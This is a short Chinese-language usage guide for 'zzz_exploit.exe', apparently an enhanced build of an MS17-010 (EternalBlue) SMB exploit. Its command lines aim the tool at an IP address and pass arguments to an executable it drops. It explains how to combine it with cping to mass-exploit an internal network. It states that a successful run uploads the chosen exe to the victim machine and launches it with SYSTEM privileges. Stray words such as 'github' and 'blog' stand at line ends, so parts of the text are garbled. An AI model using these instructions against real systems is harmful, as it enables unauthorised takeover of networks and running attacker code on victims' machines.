工具:k8增強版zzzpython
編譯:pythongit
漏洞:MS17-010github
用法:工具
zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe參數
zzz_exploit.exe 192.11.22.82 exe參數 管道名blog
如exe啓動參數爲 m.exe -Start 實戰命令爲 zzz_exploit.exe 192.11.22.82 -Startget
內網批量it
可結合cping批量溢出內網,將名稱改成smbcheck便可,但exe必須使用無參版。(其它工具也能夠,提供個IP參數便可)編譯
由於cping只會傳IP進去,不會傳其它參數。使用前需將任意exe更名爲ma.datast
溢出成功會自動將exe傳入目標機器,並以system權限啓動exe程序。權限